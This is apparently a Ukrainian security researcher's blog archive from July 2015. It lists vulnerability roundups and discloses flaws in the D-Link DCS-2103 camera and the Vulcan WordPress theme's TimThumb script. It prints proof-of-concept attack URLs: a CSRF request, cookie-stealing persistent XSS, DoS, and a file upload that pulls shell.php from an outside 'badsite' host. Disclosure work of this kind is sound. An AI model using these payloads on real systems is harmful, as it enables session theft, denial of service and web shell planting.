Архів для категорії 'Уразливості'

Добірка уразливостей

17:22 29.07.2015

В даній добірці уразливості в веб додатках:

  • GnuTLS vulnerability (деталі)
  • ownCloud Unencrypted Private Key Exposure (деталі)
  • Encore Discovery Solution Multiple Vulnerability Disclosure (деталі)
  • SaaS Marketing platform Hubspot export vulnerability (деталі)
  • Authentication bypass (SSRF) and local file disclosure in Plex Media Server (деталі)

Уразливості в плагінах для WordPress №193

23:54 25.07.2015

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Simple Visitor Stat, Simple Sticky Footer, Sliding Recent Posts, WP Symposium, Facebook Like Box. Для котрих з’явилися експлоіти.

  • WordPress Simple Visitor Stat Cross Site Scripting (деталі)
  • WordPress Simple Sticky Footer 1.3.2 CSRF / XSS (деталі)
  • WordPress Sliding Recent Posts 1.0 CSRF / XSS (деталі)
  • WordPress WP Symposium 14.11 Shell Upload (деталі)
  • WordPress Facebook Like Box 2.8.2 CSRF / XSS (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:28 25.07.2015

В даній добірці уразливості в веб додатках:

  • Barracuda Networks Firewall - Persistent Web Vulnerability (деталі)
  • Improper Access Control in ArticleFR (деталі)
  • Vulnerability in php-ZendFramework (деталі)
  • Vembu Storegrid - Multiple Critical Vulnerabilities (деталі)
  • Barracuda Networks Firewall - Client Side Exception Handling Web Vulnerability (деталі)

CSRF та XSS уразливості в D-Link DCS-2103

23:57 23.07.2015

27.11.2014

У серпні, 01.08.2014, я виявив Cross-Site Request Forgery та Cross-Site Scripting уразливості в D-Link DCS-2103 (веб камера). Це третя частина дірок в DCS-2103.

Раніше я писав про BF та XSS уразливості в D-Link DCS-2103.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

23.07.2015

Cross-Site Request Forgery (WASC-09):

CSRF уразливості у всіх розділах адмінки. Наприклад, зміна DEVICE SETTING (параметри IP camera Name, Enable OSD, Label, Show time).

http://site/vb.htm?cameratitle=Test&tstampenable=1&tstamplabel=Test&tstampformat=1

Cross-Site Scripting (WASC-08):

http://site/vb.htm?tstamplabel=</script><script>alert(document.cookie)</script>

Це persistent XSS. Код виконається на сторінках: maintenance.htm, maintenance_device.htm, maintenance_backup_restore.htm, maintenance_firmware_upgrade.htm.

Уразлива версія D-Link DCS-2103, Firmware 1.20. Дана модель з іншими прошивками також повинна бути вразливою.

Добірка уразливостей

17:26 23.07.2015

В даній добірці уразливості в веб додатках:

  • Barracuda Networks Firewall - Persistent Access Policy Vulnerability (деталі)
  • Cross-Site Request Forgery (CSRF) in Kanboard (деталі)
  • Reflected Cross-Site Scripting (XSS) in e107 (деталі)
  • SQL Injection in Е2 (деталі)
  • Barracuda Networks Firewall - Filter Bypass & Persistent Web Vulnerabilities (деталі)

Уразливості в плагінах для WordPress №192

23:59 21.07.2015

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Cart66 Lite, Ajax Store Locator, Our Team Showcase, IP Ban, WP-ViperGB. Для котрих з’явилися експлоіти.

  • Cart66 Lite WordPress Ecommerce 1.5.1.17 SQL Injection (деталі)
  • WordPress Ajax Store Locator 1.2 Arbitrary File Download (деталі)
  • WordPress Our Team Showcase 1.2 CSRF / XSS (деталі)
  • WordPress IP Ban 1.2.3 CSRF / XSS (деталі)
  • WordPress WP-ViperGB 1.3.10 CSRF / XSS (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:28 21.07.2015

В даній добірці уразливості в веб додатках:

  • EMC Documentum Foundation Services (DFS) Content Access Vulnerability (деталі)
  • SQL Injection in Dolphin (деталі)
  • Multiple SQL Injection Vulnerabilities in web2Project (деталі)
  • Reflected Cross-Site Scripting (XSS) Vulnerability in Storesprite (деталі)
  • Linksys EA2700, EA3500, E4200 and EA4500 - Authentication Bypass to Administrative Console (деталі)

Уразливості в плагінах для WordPress №191

23:54 03.07.2015

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в WordPress 4.0 та в плагінах Html5 Mp3 Player, Sexy Squeeze Pages, Ad-Manager, CM Download Manager. Для котрих з’явилися експлоіти.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:25 03.07.2015

В даній добірці уразливості в веб додатках:

Численні уразливості в темі Vulcan для WordPress

23:55 02.07.2015

Сьогодні я дослідив Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Vulcan для WordPress. Ці уразливості аналогічні тим, що я знайшов в темах для WP ще у лютому 2011, коли виявив дірки в TimThumb (та деякі дірки у квітні).

XSS (WASC-08) (в старих версіях TimThumb):

http://site/wp-content/themes/vulcan/timthumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/vulcan/timthumb.php?src=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31) (в старих версіях TimThumb):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/vulcan/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

Уразливі всі версії теми Vulcan для WordPress (в останніх версіях виправлені лише уразливості в TimThumb, але все ще є FPD в інших php-файлах).

У версіях TimThumb до 2.8, де виправлена XSS, наявні всі інші уразливості. А починаючи з версії 2.8 виправлені всі уразливості. Але дірки AoF і DoS виправлені шляхом заборони зовнішніх хостів по замовчуванню. Якщо змінити налаштування (дозволити окремі чи всі зовнішні хости), що програма дозволяє, то знову можна буде проводити атаки на інші сайти. На деяких сайтах не оновлена версія TimThumb в темі, але вони захищаються WAF (як ModSecurity). Зазначу, що WAF не захистить від FPD дірок в цій темі та TimThumb, а в деяких випадках не захистить від AoF і DoS.